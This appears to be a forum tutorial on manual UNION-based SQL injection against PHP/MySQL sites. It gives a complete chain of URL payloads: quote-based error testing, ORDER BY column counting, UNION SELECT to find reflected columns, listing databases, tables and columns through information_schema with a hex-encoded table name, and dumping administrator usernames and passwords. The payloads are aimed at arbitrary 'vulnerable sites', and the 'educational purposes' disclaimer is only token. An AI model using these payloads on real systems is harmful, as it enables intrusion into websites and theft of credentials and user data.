SQL injection Tutorial
1. A text editor of choice. (Using a pen and paper would take to long).
2. A vulnerable site. (how to find this is not my job).
3. Brains.
If you run Firefox, install the hackbar. That will ease your life in SQL injection and XSS for sure! Google that.
1. Checking for a vulnerability.
Checking if a link is vulnerable is rather easy.
Its mostly finding the vulnerable one that is the problem.
How to check this: enter (‘) single quote behind the link.
First of all you need a link like the one below.
Whit an id or almost anything behind an php? and behind the= can be tested.
This is because we know it selected something from the database and this might be an entry point.
http://www.[site].com/page.php?id=1 <–
http://www.[site].com/page.php?id=1‘
If a MySQL error occurs? Then it most likely is vulnerable to SQL Injection.
Example of a MySQL error:
Code: [Select]
Check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
Now that we know we have a vulnerable link in front of us lets move on.
2. Get the column count.
We need to get the column count in order to successfully SQL inject our target.
Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1– [no error]
http://www.[site].com/page.php?id=1+order+by+100– [no error]
Why do i do order by 100? This way we can determine if we need to use string injection.
If you do not get an error when you use order+by+100– We would need to force an error.
How do we do this? Take a close look.
http://www.[site].com/page.php?id=1‘+order+by+100–+-
I added a singe quote behind the id number and +- at the end of the line.
Executing our input as a string we should finally get an error.
[If an error happens without the single quote at 100 and at 5] please proceed without the quote.
Code: [Select]
http://www.[site].com/page.php?id=1’+order+by+1–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+99–+- [error]
http://www.[site].com/page.php?id=1’+order+by+2–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+3–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+4–+- [no error]
http://www.[site].com/page.php?id=1’+order+by+5–+- [error]
At this point we know one important thing. The vulnerable web page has 4 columns.
Because we had an error saying Unknown column ’5′ in ‘order clause’
When we executed ‘order+by+5–+-.
Which we are about to need in our next step.
3. Union Select statement.
Union select is a basic SQL injection method. Also the most common.
Union joins 2 query’s. The ID or whatever from the site we try to inject.
And ours, our query’s we use to inject the web-page.
As following:
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,2,3,4–+-
Now look at the content of the site even at the source if you don’t see any random numbers popping up.
If it does that are the returned vulnerable columns. The ones we need to inject our query’s.
For me 2 and 4 returned in the web content meaning those are the vulnerable columns.
We now need to get the version of the SQL database the server is running. If its 5 or higher its easy.
If its 4 or below its a long work around. I will be explaining version 4 and less in one of my next tutorials.
Let’s ask for version() on our first vulnerable column which was 2.
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,version(),3,4–+-
Now is the first way of asking for the version did not work you can always try another @@version:
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,@@version,3,4–+-
Now where the number 2 previously popped up there the version we requested will show its tails.
We always want it to be 5.x.x or more!
Lets say mine is: 5.2.91 lets get on we need the database name of that website for later on in our injection.
4. Select database name:
You can simply add your query at another vulnerable column or edit the one you are already using:
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,version(),3,database()–+-
Another way to find database name:
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,@@version,3,group_concat(database())–+-
Well we all know one server in most cases has more then one database. You can check this whit the following query.
You won’t be needing this a lot though.
Code: [Select]
http://www.[site].com/page.php?id=1’+union+select+1,group_concat(schema_name),3,4+from+information_schema.schemata–+-
My database is called “Database_1? no quotes. (as it pops up at where my vulnerable column shows.
Lets move on.
5. Selecting the table names.
Stay tuned it’s getting more advanced here!
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()–+-
Wow, that’s a hell of a line! Let’s clear that out for you.
The group_concat is a statement that has a max length of 1024 characters so it will return 1024 characters max.
We use this because there can be a hell load of tables and columns, this eases our work.
So it sais that group_concat selects table names from information_schema (which is database).
Extra hint: Do not copy paste the query’s that way you won’t understand them.
as i said the group_concat statement has a max length of 1024
characters and if there are more tables or columns we need to get those 2
in some cases.
If we want to find all tables you could do this manually using only concat() and adding a limit at the end of our query.
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()+limit+0,1–+-
keep increasing that limit until you have all tables.
0,1 | 1,1 | 2,1 | 3,1 | 4,1 | 5,1 | 6,1 | 7,1 | 8,1 | 9,1 | 0,2 and so on.
Now we have all our tables, Oh noes what to look for??
we simply select what we think is interesting..
Look for names like:
administrator(s), member(s)
User(s), admin(s)
tbladmin(s),tblmember(s)
Anything you thing refers to a login or an admin login.
Of cource some bad ass black hats would also look for payment stuff (I
do not support black hatting) that’s why i won’t add em in line.
Lets say i have a administrator table and we need to move on to getting the columns!!
6. Selecting the column names.
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=”administrator”–+-
Take a close look at the query it looks very similar. You only need
to change group_concat(table_name) to group_concat(column_name) and
.tables to .columns.
At the end of the line change table_schema to table_name and database to “administrator” which we found before.
You could use the limit at the end here “limit+0,1–” to find all the columns if needed.
If you get an error this is not a bad thing lets use some magic fingers to fix this.
It is because the URL does not accept “administrator” as valid. We can fix this using hex.
http://www.swingnote.com/tools/texttohex.php
Where the website says Hello to my little friend there i will paste administrator.
Below all the hex values will appear.
choose this one: 61646d696e6973747261746f72 (administrator)
Ad 0x before those numbers. That way the database knows its hex and can translate it.
How to ad it to a link. Where you now have table_name=“administrator”–+-
At the end of your link. We need to change to this. table_name=0x61646d696e6973747261746f72–+-
Entire vector:
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72–+-
Now all the column names should have shown up where your vulnerable column is.
Look for username and password or whatever relates. I have a user and pass inside my list of columns.
Ill use those as an example. This is the interesting part isn’t it? Did i finally get your full attention?
We change group_concat(column_name) to group_concat(user,0x3a,pass) 0x3a is important in this part.
It means colon in SQL statements. And those together will give user 1
and pass 1 user 2 and pass2. If we would not use it its a mess.
At the end: +from+database_1.administrator
The database_1 is the database we searched at start.
As following:
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3,4+from+db_1.administrator–+-
This time we do not need a hex for administrator.
I won’t be explaining on how to crack passwords.
This is purely for educational purposes not for causing harm.
If anything went good? You should now have the admin name and password.
Of cource that was only basic union and string SQL injection.
There is a lot more. So much it even hurts my brains.
